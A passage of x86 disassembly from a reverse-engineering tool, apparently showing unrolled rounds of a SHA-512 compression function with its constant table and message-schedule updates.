		xor	edi, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_D0]
		adc	edx, [esp+170h+var_CC]
		add	ecx, [esp+170h+var_A0]
		adc	edx, [esp+170h+var_9C]
		mov	[eax+78h], ecx
		mov	[eax+7Ch], edx
		mov	eax, edx
		mov	[esp+170h+var_D0], ecx
		mov	[esp+170h+var_CC], eax
		mov	[esp+170h+var_60], ecx
		jmp	short loc_415E47
; ---------------------------------------------------------------------------

loc_415E32:				; CODE XREF: sub_415050+CEBj
		mov	edx, [esp+170h+var_D0]
		mov	eax, [esp+170h+var_CC]
		mov	[esp+170h+var_60], edx

loc_415E47:				; CODE XREF: sub_415050+DE0j
		mov	ecx, [esp+170h+var_11C]
		mov	ebx, ecx
		mov	[esp+170h+var_5C], eax
		mov	eax, [esp+170h+var_120]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_11C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		shr	ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_158]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_11C]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_154]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_148]
		not	ebx
		and	ebx, [esp+170h+var_14C]
		not	edi
		and	edi, [esp+170h+var_150]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B20[eax*8]
		adc	esi, ds:dword_420B24[eax*8]
		add	edx, [esp+170h+var_60]
		mov	eax, [esp+170h+var_128]
		adc	esi, [esp+170h+var_5C]
		add	ecx, edx
		mov	edx, [esp+170h+var_144]
		adc	edx, esi
		add	eax, ecx
		adc	[esp+170h+var_124], edx
		mov	[esp+170h+var_148], ecx
		mov	ecx, [esp+170h+var_140]
		mov	[esp+170h+var_144], edx
		mov	edx, [esp+170h+var_13C]
		mov	ebx, ecx
		mov	ebp, edx
		shrd	ebx, ebp, 1Ch
		xor	edi, edi
		or	edi, ebx
		mov	esi, ecx
		mov	ebx, edx
		shld	edx, ecx, 1Eh
		shr	ebp, 1Ch
		shl	esi, 4
		or	esi, ebp
		shr	ebx, 2
		shl	ecx, 1Eh
		xor	ebp, ebp
		or	ebx, ecx
		mov	[esp+170h+var_128], eax
		or	ebp, edx
		mov	ecx, [esp+170h+var_13C]
		xor	esi, ebp
		mov	ebp, [esp+170h+var_140]
		mov	edx, ecx
		shld	ecx, ebp, 19h
		xor	edi, ebx
		shr	edx, 7
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_98]
		and	ecx, [esp+170h+var_140]
		shl	ebp, 19h
		xor	ecx, [esp+170h+var_90]
		or	edx, ebp
		xor	edi, edx
		mov	edx, [esp+170h+var_94]
		and	edx, [esp+170h+var_13C]
		xor	esi, ebx
		xor	edx, [esp+170h+var_8C]
		add	edi, ecx
		adc	esi, edx
		add	[esp+170h+var_148], edi
		adc	[esp+170h+var_144], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_41608D
		mov	eax, [esp+170h+var_A8]
		mov	ecx, [esp+170h+var_A4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_A4]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_118]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_114]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_118]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_114]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_D8]
		adc	edx, [esp+170h+var_D4]
		add	ecx, [esp+170h+var_E0]
		adc	edx, [esp+170h+var_DC]
		mov	[eax+80h], ecx
		mov	[eax+84h], edx
		mov	eax, edx
		mov	[esp+170h+var_D4], eax
		mov	[esp+170h+var_14], eax
		mov	eax, [esp+170h+var_128]
		mov	[esp+170h+var_D8], ecx
		mov	[esp+170h+var_18], ecx
		jmp	short loc_4160A9
; ---------------------------------------------------------------------------

loc_41608D:				; CODE XREF: sub_415050+F41j
		mov	edx, [esp+170h+var_D8]
		mov	ecx, [esp+170h+var_D4]
		mov	[esp+170h+var_18], edx
		mov	[esp+170h+var_14], ecx

loc_4160A9:				; CODE XREF: sub_415050+103Bj
		mov	ecx, [esp+170h+var_124]
		mov	ebx, ecx
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_124]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_120]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_124]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_11C]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_14C]
		not	ebx
		and	ebx, [esp+170h+var_154]
		not	edi
		and	edi, [esp+170h+var_158]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B28[eax*8]
		adc	esi, ds:dword_420B2C[eax*8]
		add	edx, [esp+170h+var_18]
		mov	eax, [esp+170h+var_150]
		adc	esi, [esp+170h+var_14]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_130], eax
		mov	[esp+170h+var_14C], ecx
		mov	[esp+170h+var_150], eax
		adc	[esp+170h+var_12C], ecx
		mov	eax, [esp+170h+var_144]
		mov	ecx, [esp+170h+var_148]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ecx, eax
		mov	ebx, [esp+170h+var_148]
		mov	ebp, eax
		shld	ebp, ebx, 19h
		xor	edx, edx
		or	edx, ebp
		mov	ebp, [esp+170h+var_13C]
		xor	ebp, [esp+170h+var_134]
		shl	ebx, 19h
		shr	ecx, 7
		or	ecx, ebx
		xor	esi, edx
		mov	edx, [esp+170h+var_140]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_138]
		and	ebp, eax
		mov	eax, [esp+170h+var_13C]
		and	eax, [esp+170h+var_134]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_148]
		and	edx, ecx
		xor	ebx, edx
		xor	ebp, eax
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_150], edi
		adc	[esp+170h+var_14C], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_4162D1
		mov	eax, [esp+170h+var_C8]
		mov	ecx, [esp+170h+var_C4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_C4]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_D0]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_CC]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_D0]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_CC]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_118]
		adc	edx, [esp+170h+var_114]
		add	ecx, [esp+170h+var_100]
		adc	edx, [esp+170h+var_FC]
		mov	[eax+88h], ecx
		mov	[eax+8Ch], edx
		mov	eax, edx
		mov	[esp+170h+var_118], ecx
		mov	[esp+170h+var_114], eax
		mov	[esp+170h+var_48], ecx
		jmp	short loc_4162E0
; ---------------------------------------------------------------------------

loc_4162D1:				; CODE XREF: sub_415050+1196j
		mov	edx, [esp+170h+var_118]
		mov	eax, [esp+170h+var_114]
		mov	[esp+170h+var_48], edx

loc_4162E0:				; CODE XREF: sub_415050+127Fj
		mov	ecx, [esp+170h+var_12C]
		mov	ebx, ecx
		mov	[esp+170h+var_44], eax
		mov	eax, [esp+170h+var_130]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_12C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_128]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_12C]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_124]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_154]
		not	ebx
		and	ebx, [esp+170h+var_11C]
		not	edi
		and	edi, [esp+170h+var_120]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B30[eax*8]
		adc	esi, ds:dword_420B34[eax*8]
		add	edx, [esp+170h+var_48]
		mov	eax, [esp+170h+var_158]
		adc	esi, [esp+170h+var_44]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_138], eax
		mov	[esp+170h+var_154], ecx
		mov	[esp+170h+var_158], eax
		adc	[esp+170h+var_134], ecx
		mov	ecx, [esp+170h+var_150]
		mov	eax, [esp+170h+var_14C]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	edi, edi
		or	edi, edx
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shr	edx, 2
		shl	ecx, 1Eh
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ebx, [esp+170h+var_150]
		mov	ebp, eax
		shld	ebp, ebx, 19h
		shl	ebx, 19h
		mov	ecx, eax
		shr	ecx, 7
		or	ecx, ebx
		xor	edx, edx
		or	edx, ebp
		xor	edi, ecx
		mov	ecx, [esp+170h+var_150]
		xor	esi, edx
		mov	edx, [esp+170h+var_140]
		mov	ebx, ecx
		xor	ebx, edx
		and	ebx, [esp+170h+var_148]
		mov	ebp, eax
		xor	ebp, [esp+170h+var_13C]
		and	eax, [esp+170h+var_13C]
		and	ebp, [esp+170h+var_144]
		and	ecx, edx
		xor	ebx, ecx
		xor	ebp, eax
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_158], edi
		adc	[esp+170h+var_154], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_41651B
		mov	eax, [esp+170h+var_D8]
		mov	ecx, [esp+170h+var_D4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_D4]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_F0]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_EC]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_F0]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_EC]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_C8]
		adc	edx, [esp+170h+var_C4]
		add	ecx, [esp+170h+var_110]
		adc	edx, [esp+170h+var_10C]
		mov	[eax+90h], ecx
		mov	[eax+94h], edx
		mov	eax, edx
		mov	[esp+170h+var_C8], ecx
		mov	[esp+170h+var_C4], eax
		mov	[esp+170h+var_80], ecx
		jmp	short loc_416530
; ---------------------------------------------------------------------------

loc_41651B:				; CODE XREF: sub_415050+13D4j
		mov	edx, [esp+170h+var_C8]
		mov	eax, [esp+170h+var_C4]
		mov	[esp+170h+var_80], edx

loc_416530:				; CODE XREF: sub_415050+14C9j
		mov	ecx, [esp+170h+var_134]
		mov	ebx, ecx
		mov	[esp+170h+var_7C], eax
		mov	eax, [esp+170h+var_138]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_134]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_130]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_134]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_12C]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_11C]
		not	ebx
		and	ebx, [esp+170h+var_124]
		not	edi
		and	edi, [esp+170h+var_128]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B38[eax*8]
		adc	esi, ds:dword_420B3C[eax*8]
		add	edx, [esp+170h+var_80]
		mov	eax, [esp+170h+var_120]
		adc	esi, [esp+170h+var_7C]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_140], eax
		mov	[esp+170h+var_11C], ecx
		mov	[esp+170h+var_120], eax
		adc	[esp+170h+var_13C], ecx
		mov	ecx, [esp+170h+var_158]
		mov	eax, [esp+170h+var_154]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	edi, edi
		or	edi, edx
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shr	edx, 2
		shl	ecx, 1Eh
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ebx, [esp+170h+var_158]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_14C]
		shl	ebx, 19h
		xor	esi, edx
		mov	edx, [esp+170h+var_150]
		mov	ecx, eax
		shr	ecx, 7
		or	ecx, ebx
		xor	edi, ecx
		mov	ecx, [esp+170h+var_158]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_148]
		and	edx, ecx
		mov	ecx, [esp+170h+var_14C]
		xor	ebp, eax
		and	ebp, [esp+170h+var_144]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_120], edi
		adc	[esp+170h+var_11C], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_416761
		mov	eax, [esp+170h+var_E8]
		mov	ecx, [esp+170h+var_E4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_E4]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_118]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_114]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_118]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_114]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_108]
		adc	edx, [esp+170h+var_104]
		add	ecx, [esp+170h+var_F0]
		adc	edx, [esp+170h+var_EC]
		mov	[eax+98h], ecx
		mov	[eax+9Ch], edx
		mov	eax, edx
		mov	[esp+170h+var_F0], ecx
		mov	[esp+170h+var_EC], eax
		mov	[esp+170h+var_78], ecx
		jmp	short loc_416776
; ---------------------------------------------------------------------------

loc_416761:				; CODE XREF: sub_415050+1626j
		mov	edx, [esp+170h+var_F0]
		mov	eax, [esp+170h+var_EC]
		mov	[esp+170h+var_78], edx

loc_416776:				; CODE XREF: sub_415050+170Fj
		mov	ecx, [esp+170h+var_13C]
		mov	ebx, ecx
		mov	[esp+170h+var_74], eax
		mov	eax, [esp+170h+var_140]
		mov	edx, ecx
		xor	esi, esi
		shr	edx, 9
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		or	edx, edi
		xor	ebx, ebx
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_13C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		xor	edi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_13C]
		mov	ebx, ecx
		and	ecx, [esp+170h+var_134]
		mov	edi, eax
		and	eax, [esp+170h+var_138]
		not	ebx
		and	ebx, [esp+170h+var_12C]
		not	edi
		and	edi, [esp+170h+var_130]
		xor	ebx, ecx
		mov	ecx, [esp+170h+var_124]
		xor	edi, eax
		mov	eax, [esp+170h+var_15C]
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B40[eax*8]
		adc	esi, ds:dword_420B44[eax*8]
		add	edx, [esp+170h+var_78]
		mov	eax, [esp+170h+var_128]
		adc	esi, [esp+170h+var_74]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_148], eax
		mov	[esp+170h+var_124], ecx
		mov	[esp+170h+var_128], eax
		adc	[esp+170h+var_144], ecx
		mov	eax, [esp+170h+var_11C]
		mov	ecx, [esp+170h+var_120]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ecx, eax
		mov	ebx, [esp+170h+var_120]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_154]
		shl	ebx, 19h
		shr	ecx, 7
		or	ecx, ebx
		xor	esi, edx
		mov	edx, [esp+170h+var_158]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_120]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_150]
		and	edx, ecx
		mov	ecx, [esp+170h+var_154]
		xor	ebp, eax
		and	ebp, [esp+170h+var_14C]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_128], edi
		adc	[esp+170h+var_124], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_4169A9
		mov	eax, [esp+170h+var_C8]
		mov	ecx, [esp+170h+var_C4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_C4]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_F8]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_F4]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_F8]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_F4]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_B8]
		adc	edx, [esp+170h+var_B4]
		add	ecx, [esp+170h+var_E8]
		adc	edx, [esp+170h+var_E4]
		mov	[eax+0A0h], ecx
		mov	[eax+0A4h], edx
		mov	eax, edx
		mov	[esp+170h+var_E8], ecx
		mov	[esp+170h+var_E4], eax
		mov	[esp+170h+var_68], ecx
		jmp	short loc_4169BE
; ---------------------------------------------------------------------------

loc_4169A9:				; CODE XREF: sub_415050+1868j
		mov	edx, [esp+170h+var_E8]
		mov	eax, [esp+170h+var_E4]
		mov	[esp+170h+var_68], edx

loc_4169BE:				; CODE XREF: sub_415050+1957j
		mov	ecx, [esp+170h+var_144]
		mov	ebx, ecx
		mov	[esp+170h+var_64], eax
		mov	eax, [esp+170h+var_148]
		mov	edx, ecx
		xor	esi, esi
		shr	edx, 9
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		or	edx, edi
		xor	ebx, ebx
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_144]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		xor	edi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_144]
		mov	ebx, ecx
		and	ecx, [esp+170h+var_13C]
		mov	edi, eax
		and	eax, [esp+170h+var_140]
		not	ebx
		and	ebx, [esp+170h+var_134]
		not	edi
		and	edi, [esp+170h+var_138]
		xor	ebx, ecx
		mov	ecx, [esp+170h+var_12C]
		xor	edi, eax
		mov	eax, [esp+170h+var_15C]
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B48[eax*8]
		adc	esi, ds:dword_420B4C[eax*8]
		add	edx, [esp+170h+var_68]
		mov	eax, [esp+170h+var_130]
		adc	esi, [esp+170h+var_64]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_150], eax
		mov	[esp+170h+var_12C], ecx
		mov	[esp+170h+var_130], eax
		adc	[esp+170h+var_14C], ecx
		mov	eax, [esp+170h+var_124]
		mov	ecx, [esp+170h+var_128]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ecx, eax
		mov	ebx, [esp+170h+var_128]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_11C]
		shl	ebx, 19h
		shr	ecx, 7
		or	ecx, ebx
		xor	esi, edx
		mov	edx, [esp+170h+var_120]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_128]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_158]
		and	edx, ecx
		mov	ecx, [esp+170h+var_11C]
		xor	ebp, eax
		and	ebp, [esp+170h+var_154]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_130], edi
		adc	[esp+170h+var_12C], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_416BF1
		mov	eax, [esp+170h+var_B0]
		mov	ecx, [esp+170h+var_AC]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
